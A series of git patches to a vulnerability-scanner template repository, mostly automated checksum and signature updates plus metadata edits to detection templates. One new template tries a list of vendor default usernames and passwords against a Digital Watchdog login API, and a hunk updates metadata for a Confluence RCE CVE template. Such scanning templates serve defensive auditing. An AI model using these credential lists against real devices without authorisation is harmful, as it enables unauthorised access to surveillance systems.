javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 @@ -8423,7 +8423,7 @@ network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8d network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf network/detection/esmtp-detect.yaml:95382976e7ca8c41cc9ad06ac55d64033fbb9181 network/detection/exim-detect.yaml:12ecf40a7d27e1c6ae0a4328a727c5c1119f5b75 -network/detection/expn-mail-detect.yaml:53d80f2928345819aa20811d080b66a1607f9008 +network/detection/expn-mail-detect.yaml:cd8960152e5b6a4777ec6950528164ba48983d81 network/detection/finger-detect.yaml:ad87af0aee39f2d5013dbee8692c37414df78363 network/detection/gnu-inetutils-ftpd-detect.yaml:f089a5ff96e16e7fb260973351f635735db6fdaf network/detection/gopher-detect.yaml:fc44051b14f3cb7f8b70dddba8231ea83d5e4dbd @@ -8454,7 +8454,7 @@ network/detection/sap-router.yaml:3cdb63aecfb328ce98b6bf81bbc5de6e61d70526 network/detection/smb-detect.yaml:dca4a7005c959c0a407f6413b3e89638c485ff13 network/detection/smtp-detect.yaml:5fa2e7cef1d9aec1de4c88d093d974c897f4dc9d network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6911f -network/detection/starttls-mail-detect.yaml:8714db63581c72fbbe8d013abb39f7c46c03d3a2 +network/detection/starttls-mail-detect.yaml:5d06e17119e499ff79a593821eae44d928007c69 network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 network/detection/telnet-detect.yaml:6d553279d154fa767ad8cbdbdc3b0573fb1e03a9 network/detection/totemomail-smtp-detect.yaml:fe08b19192b77bb003c249863c65a28a2990f5a9 @@ -8470,8 +8470,8 @@ network/enumeration/kafka-topics-list.yaml:a806b0049ffc95034dc2fb163548ee8765bd3 network/enumeration/mongodb-info-enum.yaml:5f1b2b25b89f10477193793aa775b9aac5fcc019 network/enumeration/niagara-fox-info-enum.yaml:5b94264b3accb70d345258192f5ab98c4e222d83 network/enumeration/psql-user-enum.yaml:7522ae086ec23f345af67bc13129c810f22a6d94 -network/enumeration/smtp/smtp-commands-enum.yaml:60471df0fd3aa24988465ae6514305d534e32d9f -network/enumeration/smtp/smtp-user-enum.yaml:b06c3dfe3c14149816325f2b24671e092410acfe +network/enumeration/smtp/smtp-commands-enum.yaml:18d2f3bfd9cb5c151953a1b77bb5e697bce6bbf7 +network/enumeration/smtp/smtp-user-enum.yaml:9c22817e414338d8cea89f836cce246887bd9b52 network/exposures/cisco-smi-exposure.yaml:d4cc1333b0ece863dd0a987c3f7cb59c9489f5e8 network/exposures/exposed-adb.yaml:e758a0fcbdad2ce08ea1985b9b4c6721feafd8c5 network/exposures/exposed-dockerd.yaml:351e18b9fea269da82ff3b3d5a5460179e9a6789 @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ab6335c8e17345ec90ec96e8c383b28993e52f7f +templates-checksum.txt:c5704abafa33469ed485807c267b56abaddf6952 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 38e83e7844877a95374a466f8f0f3db09d0d4c1d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 07:46:13 +0000 Subject: [PATCH 270/847] Auto Template Signing [Mon May 27 07:46:13 UTC 2024] :robot: --- javascript/enumeration/minecraft-enum.yaml | 2 +- network/detection/esmtp-detect.yaml | 2 +- network/detection/exim-detect.yaml | 2 +- network/detection/totemomail-smtp-detect.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index c5baa4a68a..aae2507b33 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -45,4 +45,4 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a0048304602210097a010ea589db898dd8dfb9813cef0ddf6a92c583644a11ed95aa50ef8147b28022100ea4cfe825571c9cf2c1afc8dd0db45993bbd5e5b5145b18485b60ea965d66fc1:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220389a4d037f4807679f2ae67a85add1c5efd5ca8525016010c3c3553b6fa59f7e02201f1ba4c1bdc64bb94f2c44f8b7b147a7a2360d753e8e2af17553268c8537ac3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 7b353af8ef..0f5937ac2c 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -32,4 +32,4 @@ tcp: - "ESMTP Postfix" - "220" condition: and -# digest: 490a0046304402203a1fffa26c753ac23dccc2377fa851d78256f56ea912590637a203aaa55268ab02202f61ea792860ccb76be454a7b4a39ea73419a3c33b13d95ded5f83129df47780:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022011a51b24502628782eca7789641c27bf2c980f0af2521e85997ad491e3bded2302204c4c0e4ec61f9bbd9e41af502ac1a2247b838d7eaed110ab01ea86447037d8bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/detection/exim-detect.yaml b/network/detection/exim-detect.yaml index 63006cd2cd..1bc94ab45f 100644 --- a/network/detection/exim-detect.yaml +++ b/network/detection/exim-detect.yaml @@ -36,4 +36,4 @@ tcp: name: version regex: - '(?i)SMTP.Exim\s?([\w.]+)' -# digest: 490a004630440220178c0408f24267ad4993879d249bd7489f055dab96177bbab6bfbc09731946f702200318d596f7942d10eb22ea4fb10ff9c1ee01654703abdeee1fff721c0209368f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027e56f04ab5d482b5ab43df544ae76da503a2d5df4e7ca14da7cf410b0a5f768022100b8cb5ab3532efb070351de9754c67daaff4dcbf6d0ac8c30d80260f6ed6097a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml index 57d7e92b84..09fa959d21 100644 --- a/network/detection/totemomail-smtp-detect.yaml +++ b/network/detection/totemomail-smtp-detect.yaml @@ -23,4 +23,4 @@ tcp: - type: word words: - "totemomail" -# digest: 4b0a00483046022100b67feef4821f9caec50eb6a57ec9cbe55b79ecd74e8589a3037158853ceea7be022100a0eca77f9a05c0a32c8233db8d60135673e52050c80ddc4b58310a1fb185a246:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ad0098adfce5d43092de486498d8b9a43d658ce1534daa9c3004100de00160c5022100a85b9073683e373bdb27ded8339335735adf325a53a80155c76af84f23c41758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 82f5a2e467a20cade79a14929f70a5cc18a919a7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 27 May 2024 13:27:28 +0530 Subject: [PATCH 271/847] updated matchers --- http/technologies/sap/sap-netweaver-detect.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index 9c80b45879..9ea5d6e1f9 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -1,14 +1,17 @@ id: sap-netweaver-detect info: - name: SAP NetWeaver ICM Detection + name: SAP NetWeaver ICM - Detect author: randomstr1ng,righettod severity: info - description: Detection of SAP NetWeaver ABAP Webserver or Java Application Server (ICM/ICF) + description: | + Detection of SAP NetWeaver ABAP Webserver or Java Application Server (ICM/ICF) metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-266008933 - tags: sap,webserver,tech + fofa-query: "sap-server:" + tags: sap,webserver,tech,detect http: - method: GET @@ -19,13 +22,13 @@ http: max-redirects: 2 matchers-condition: or matchers: - - type: regex + - type: word part: header - regex: + words: - "sap-server:" - - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or + case-insensitive: true - type: word part: body From 4cba0589a166f7010427ca151aad97731420d4ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 27 May 2024 13:29:48 +0530 Subject: [PATCH 272/847] Update microfocus-filr-panel.yaml --- http/exposed-panels/microfocus-filr-panel.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/microfocus-filr-panel.yaml b/http/exposed-panels/microfocus-filr-panel.yaml index 8aa1782d6b..aa2e673119 100644 --- a/http/exposed-panels/microfocus-filr-panel.yaml +++ b/http/exposed-panels/microfocus-filr-panel.yaml @@ -11,11 +11,11 @@ info: cpe: cpe:2.3:a:microfocus:filr:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: filr - shodan-query: http.html:"Micro Focus Filr" - vendor: microfocus verified: true - tags: panel,microfocus,filr + product: filr + vendor: microfocus + shodan-query: http.html:"Micro Focus Filr" + tags: panel,microfocus,filr,detect http: - method: GET @@ -45,4 +45,4 @@ http: part: body group: 1 regex: - - '(?i)\s+([0-9-]+)\s+Micro\s+Focus' \ No newline at end of file + - '(?i)\s+([0-9-]+)\s+Micro\s+Focus' From 3c73e13b6877cbaead998664bf46234a13c61089 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 27 May 2024 13:40:27 +0530 Subject: [PATCH 273/847] Create digital-watchdog-default-login.yaml --- .../digital-watchdog-default-login.yaml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/default-logins/digital-watchdog-default-login.yaml diff --git a/http/default-logins/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog-default-login.yaml new file mode 100644 index 0000000000..f0dae8cda5 --- /dev/null +++ b/http/default-logins/digital-watchdog-default-login.yaml @@ -0,0 +1,43 @@ +id: digital-watchdog-default-login + +info: + name: Digital Watchdog - Default Login + author: omranisecurity + severity: high + description: | + Digital Watchdog default login credentials were discovered. + reference: + - https://digitalwatchdog.happyfox.com/kb/article/686-recorder-and-raid-default-login-list/ + metadata: + verified: true + shodan-query: http.favicon.hash:868509217 + fofa-query: icon_hash="868509217" + tags: digital-watchdog,default-login,dw-Spectrum + +http: + - raw: + - | + POST /web/rest/v1/login/sessions HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"{{user}}","password":"{{pass}}","setCookie":true} + + attack: clusterbomb + payloads: + user: + - admin + - dwuser + pass: + - admin + - admin1234 + - admin12345 + - Dw5pectrum + + matchers: + - type: dsl + dsl: + - 'contains_all(set_cookie, "x-runtime-guid=")' + - 'contains(body, "token\":")' + - 'status_code == 200' + condition: and From 433c4cace8222bf99936b154e4ba7e8487b69c21 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 27 May 2024 13:43:21 +0530 Subject: [PATCH 274/847] error fix --- http/default-logins/digital-watchdog-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/default-logins/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog-default-login.yaml index f0dae8cda5..a872682d03 100644 --- a/http/default-logins/digital-watchdog-default-login.yaml +++ b/http/default-logins/digital-watchdog-default-login.yaml @@ -16,7 +16,7 @@ info: http: - raw: - - | + - | POST /web/rest/v1/login/sessions HTTP/1.1 Host: {{Hostname}} Content-Type: application/json From 6c428681c30a9e6d74f3e360fcbfa6c69496ff3c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 May 2024 13:57:14 +0530 Subject: [PATCH 275/847] Rename http/default-logins/digital-watchdog-default-login.yaml to http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml --- .../{ => digital-watchdog}/digital-watchdog-default-login.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/default-logins/{ => digital-watchdog}/digital-watchdog-default-login.yaml (100%) diff --git a/http/default-logins/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml similarity index 100% rename from http/default-logins/digital-watchdog-default-login.yaml rename to http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml From 1ea5fe2606f56b4eb2ece10dd858c7babd074959 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:28:11 +0000 Subject: [PATCH 276/847] Auto Generated Templates Checksum [Mon May 27 08:28:11 UTC 2024] :robot: --- templates-checksum.txt | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a41f6b36a5..e4e7187877 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6935,7 +6935,7 @@ http/technologies/rsshub-detect.yaml:78befe0bfa5036aea006bfb433aa5e8b20f6eb5e http/technologies/s3-detect.yaml:17054560fae17482a2b175a5c0c9baad426c5a6a http/technologies/samsung-smarttv-debug.yaml:25586370a97a672fd2bb066dd4d5fd6c671e4302 http/technologies/sap/sap-igs-detect.yaml:3023bc9a78e2e76f340362a467fd237d2a24ef9e -http/technologies/sap/sap-netweaver-detect.yaml:4bf5e37b8d6972a0ab544bb7efe2f4e795577a59 +http/technologies/sap/sap-netweaver-detect.yaml:edb9019351db31f4db98b9df2426ed0f63d38359 http/technologies/sap/sap-netweaver-webgui.yaml:44bdfe780e8dd940ce87f592cb74595e0ea9b052 http/technologies/sap/sap-web-dispatcher-admin-portal.yaml:2b92bc6c5e85d8fd6ec692c484964dd98db2ef0d http/technologies/sap/sap-web-dispatcher.yaml:c54fcf650d5eb35ed5f774056cb21cee58392944 @@ -8344,7 +8344,7 @@ javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df -javascript/enumeration/minecraft-enum.yaml:27f745158a79ebd71a7854dc0f4f6da25fc9d7ab +javascript/enumeration/minecraft-enum.yaml:b479fd24c897f43fa8931185c0dd0b03e4a57c5a javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86 javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 @@ -8421,8 +8421,8 @@ network/detection/cql-native-transport.yaml:8f848170731a7e132e745e9ce45824c9e2fb network/detection/detect-addpac-voip-gateway.yaml:a06e5be5c8af1fc7e79ed9011ba9c91403d1069f network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8da4 network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf -network/detection/esmtp-detect.yaml:95382976e7ca8c41cc9ad06ac55d64033fbb9181 -network/detection/exim-detect.yaml:12ecf40a7d27e1c6ae0a4328a727c5c1119f5b75 +network/detection/esmtp-detect.yaml:132acdd524e1d1c32442a9fa82f3632eb0afd7e1 +network/detection/exim-detect.yaml:c5cf41f9583a59688faba62dd6c08fa9bb0e6c79 network/detection/expn-mail-detect.yaml:cd8960152e5b6a4777ec6950528164ba48983d81 network/detection/finger-detect.yaml:ad87af0aee39f2d5013dbee8692c37414df78363 network/detection/gnu-inetutils-ftpd-detect.yaml:f089a5ff96e16e7fb260973351f635735db6fdaf @@ -8457,7 +8457,7 @@ network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6 network/detection/starttls-mail-detect.yaml:5d06e17119e499ff79a593821eae44d928007c69 network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 network/detection/telnet-detect.yaml:6d553279d154fa767ad8cbdbdc3b0573fb1e03a9 -network/detection/totemomail-smtp-detect.yaml:fe08b19192b77bb003c249863c65a28a2990f5a9 +network/detection/totemomail-smtp-detect.yaml:255495f466146abd4f4fafed68a703e8ddc646aa network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c5704abafa33469ed485807c267b56abaddf6952 +templates-checksum.txt:505c98612682a0603c5b64da1ab9cc8adcca8d55 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 58c407ea8d7b1cea344a639880d0494516563c13 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:28:49 +0000 Subject: [PATCH 278/847] Auto Generated Templates Checksum [Mon May 27 08:28:49 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e4e7187877..2ce8921ee7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4061,7 +4061,7 @@ http/exposed-panels/metasploit-setup-page.yaml:b80a5e11ce34feedcc9992dc5e48f4dbf http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a058 http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 -http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 +http/exposed-panels/microfocus-filr-panel.yaml:c235633a12af9ea65ce3e61eadae5492bd68b5f7 http/exposed-panels/microfocus-lifecycle-panel.yaml:e24f25ddf4c8adcddde94e8284c533410f54b8bb http/exposed-panels/microfocus-vibe-panel.yaml:5405bdcbb28cf44943d03d51c8ce86ec8ba52055 http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:505c98612682a0603c5b64da1ab9cc8adcca8d55 +templates-checksum.txt:2fdf89d9eb7ee6cdf842d60ab3a17e0e96133532 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c98535fe41cf32923c0abe0f5c48f216e6434608 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:29:51 +0000 Subject: [PATCH 279/847] Auto Template Signing [Mon May 27 08:29:51 UTC 2024] :robot: --- http/technologies/sap/sap-netweaver-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index 9ea5d6e1f9..cfce8f3d35 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -43,3 +43,4 @@ http: part: header kval: - "server" +# digest: 490a004630440220739dd9983a583700d0a8c3ec9015f0d6903bb7ba5798c739767cd9273f5814f2022070001e145cad777642ee758312eba04f47ac5bb0ec5621434fdf475c77e53744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cf924bb19fc94be4bb12158fb8d43f310ff42605 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 May 2024 14:03:39 +0530 Subject: [PATCH 280/847] minor update --- http/cves/2024/CVE-2024-21683.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 690ddc2f10..7ae1b1723f 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -10,12 +10,16 @@ info: - https://confluence.atlassian.com/security/security-bulletin-may-21-2024-1387867145.html - https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated - https://nvd.nist.gov/vuln/detail/CVE-2024-21683 + - https://confluence.atlassian.com/pages/viewpage.action?pageId=1387867145 + - https://jira.atlassian.com/browse/CONFSERVER-95832 classification: cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.3 cve-id: CVE-2024-21683 cwe-id: CWE-78 - tags: cve,cve2024,atlassian,confluence,rce,authenticated + epss-score: 0.00043 + epss-percentile: 0.0866 + tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive variables: username: "{{username}}" From d5e4588c565389c17556511a051e738cfc1542a4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:34:45 +0000 Subject: [PATCH 281/847] Auto Generated New Template Addition List [Mon May 27 08:34:45 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d3ddae9e78..fc889fb6f6 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2022/CVE-2022-1580.yaml http/cves/2023/CVE-2023-48084.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml +http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 5a207daa3d05eb0ada55b599ccb78b8b6935be32 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:34:56 +0000 Subject: [PATCH 282/847] Auto Generated Templates Checksum [Mon May 27 08:34:56 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2ce8921ee7..15981522b0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3355,6 +3355,7 @@ http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d2 http/default-logins/dell/dell-idrac-default-login.yaml:1dc3a2376aeb7ca1b68b49de2fb293c5d3f988d5 http/default-logins/dell/dell-idrac9-default-login.yaml:ff8233327b0de4c8fad6255f51c14ec0771fb8de http/default-logins/dell/emcecom-default-login.yaml:67e9a911b490370e01545f18a1ed6adbb5333fb8 +http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:08687154827e9f23b01688eb3729593fa00aaf5d http/default-logins/digitalrebar/digitalrebar-default-login.yaml:87a2a0df776e6ceab4b3a02845b43bf93f6d3ada http/default-logins/druid/druid-default-login.yaml:cdf960a64c7f527a149b2a1b5cf62b7d40c4aeee http/default-logins/dvwa/dvwa-default-login.yaml:0803d0330a8ea7cbd071f03e54c1ea65d415ee76 @@ -6935,7 +6936,7 @@ http/technologies/rsshub-detect.yaml:78befe0bfa5036aea006bfb433aa5e8b20f6eb5e http/technologies/s3-detect.yaml:17054560fae17482a2b175a5c0c9baad426c5a6a http/technologies/samsung-smarttv-debug.yaml:25586370a97a672fd2bb066dd4d5fd6c671e4302 http/technologies/sap/sap-igs-detect.yaml:3023bc9a78e2e76f340362a467fd237d2a24ef9e -http/technologies/sap/sap-netweaver-detect.yaml:edb9019351db31f4db98b9df2426ed0f63d38359 +http/technologies/sap/sap-netweaver-detect.yaml:fa681b31c3e1cc867d90aa5571b6d42318cf0da4 http/technologies/sap/sap-netweaver-webgui.yaml:44bdfe780e8dd940ce87f592cb74595e0ea9b052 http/technologies/sap/sap-web-dispatcher-admin-portal.yaml:2b92bc6c5e85d8fd6ec692c484964dd98db2ef0d http/technologies/sap/sap-web-dispatcher.yaml:c54fcf650d5eb35ed5f774056cb21cee58392944 @@ -8563,7 +8564,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2fdf89d9eb7ee6cdf842d60ab3a17e0e96133532 +templates-checksum.txt:e214e3dcbd37b62ccd20063108f02dc07d5b4aaa wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From bf064914eadbae3ad17fd3db281a7f55cfd982cb Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:35:30 +0000 Subject: [PATCH 283/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6ea040fb02..534014cb60 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' + - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: From 7b0e556283b0e98ee953777f2edf3330e691d574 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 May 2024 14:06:22 +0530 Subject: [PATCH 284/847] added metadata --- http/cves/2024/CVE-2024-21683.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 7ae1b1723f..08f731727f 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -19,6 +19,9 @@ info: cwe-id: CWE-78 epss-score: 0.00043 epss-percentile: 0.0866 + metadata: + shodan-query: product:"Confluence" + verified: true tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive variables: From f1416080b043068dd82aabf784fb0ba841e98bae Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:36:41 +0000 Subject: [PATCH 285/847] Auto Template Signing [Mon May 27 08:36:41 UTC 2024] :robot: --- .../digital-watchdog/digital-watchdog-default-login.yaml | 1 + http/exposed-panels/microfocus-filr-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml index a872682d03..d5ad80f909 100644 --- a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml +++ b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml @@ -41,3 +41,4 @@ http: - 'contains(body, "token\":")' - 'status_code == 200' condition: and +# digest: 4a0a0047304502200acef2ad5135fd4b7c240538331396ec3066b4d54b992ea622574bcea98ede8d022100ce29a2323d606b29f77387ad8742ee9602a8afda2a474d96f068dfa6b6c019a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/microfocus-filr-panel.yaml b/http/exposed-panels/microfocus-filr-panel.yaml index aa2e673119..84917c5591 100644 --- a/http/exposed-panels/microfocus-filr-panel.yaml +++ b/http/exposed-panels/microfocus-filr-panel.yaml @@ -46,3 +46,4 @@ http: group: 1 regex: - '(?i)\s+([0-9-]+)\s+Micro\s+Focus' +# digest: 4a0a0047304502207c7fce55a5b7a65938e1c7c253a25bc6975da36de0926b166ef9bb79fc6b87d3022100d7218eb2f42de3aae6bb57dea6d3d027d6afc75a816310f9a7e8254bb9e53247:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4673efd298002300b8d32f59d6153ead908ab166 Mon Sep 17 00:00:00 2001 